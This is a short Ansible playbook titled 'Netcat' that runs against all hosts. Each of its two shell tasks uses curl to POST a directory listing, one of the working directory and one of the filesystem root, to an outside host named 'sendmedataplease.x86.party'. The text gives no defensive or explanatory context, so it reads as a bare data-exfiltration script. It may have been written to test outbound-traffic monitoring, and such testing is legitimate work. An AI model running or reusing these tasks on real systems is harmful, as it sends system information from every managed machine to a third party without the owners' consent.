---
- name: Netcat
  hosts: all
 
  tasks:
  - name: Connect out to x86.party.
    shell: curl -d "$(ls -la .)" -X POST https://sendmedataplease.x86.party
    register: shell
  
  - name: Connect out to x86.party.
    shell: curl -d "$(ls -la /)" -X POST https://sendmedataplease.x86.party
    register: shell

